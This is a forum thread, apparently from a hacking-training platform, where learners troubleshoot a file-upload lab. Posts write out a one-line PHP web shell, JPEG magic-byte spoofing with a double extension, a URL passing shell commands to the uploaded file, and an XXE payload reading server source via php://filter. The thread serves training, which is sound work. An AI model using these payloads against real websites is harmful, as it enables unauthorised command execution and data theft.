Skills Assessment - File Upload Attacks

HTB Content Academy
1

Hello,

I have a problem with solving the Skills Assessment - File Upload Attacks.

Here are the steps I followed:

  1. I created a shell.php file with the following code:
<?php system($_REQUEST['cmd']); ?>`

يُرجى استخدام الرمز بحذر. مزيد من المعلومات

content_copy

  1. I used a hex editor to convert the file to JPEG format by adding the following bytes:

FF D8 FF EE

  1. I changed the file extension to .phar.jpeg.
  2. I uploaded the file to a website and it was successfully uploaded.
  3. I tried to view the source code of the file by going to the following URL:

view-source:http://94.237.59.12:38629/contact/user_feedback_submissions/test2.phar.jpeg?cmd=cd%20../../../../../;ls

At this point, I do not get any results, and even viewing the source code does not show any results.

Can some one help me?
Thanks

Screenshot_2023-10-24_06_54_10
Screenshot_2023-10-24_06_54_101918×928 87 KB

2

Hey! Looks like you are really close.

I would first try to get the source code in a similar way to the Limited File Uploads section. Once you have the upload.php source code you should be able to see what is happening on the back end. The image file gets modified during the upload process.

Take a look at the source code of upload.php and you will see.
-onthesauce

3

I try this code
“”"<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE svg <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php &xxe;

But it didn’t work
There’s another way, please?

4

did the same steps and modified the url to get prefix date to filename. but when i open the url, i only get this string and not the flag.txt:

����JFIF��� a( %!1!%)+…383-7(-.+  e- -----±-/.-/–±–±------±±--------+.----------���"��ea��; !1AQaq�"2������R�#Bbr��a$������+!1AQaq�#��"2��� ?������ϲQh�K!d-�d (������ V)�x(\� Ač�@N��Yv,��U�H�>�a,���w{ ;{G�"�H֨S��?w> _Qr��+��[�#�ؿ�g~(E�H���f������|�J\c�������]}�=x���)��Q�dh�)+L�Ӌ����v

5

Can someone tell me which wordlist was used to get the user_feedback_submissions directory ? there is no hint in the website about its location. I fuzzed with raft-directory-large wordlist of seclists + the directories-big-2.3 wordlist but nothing …

Thanks in advance

6

You exfiltrate that from a file that you can get through a XXE :slight_smile: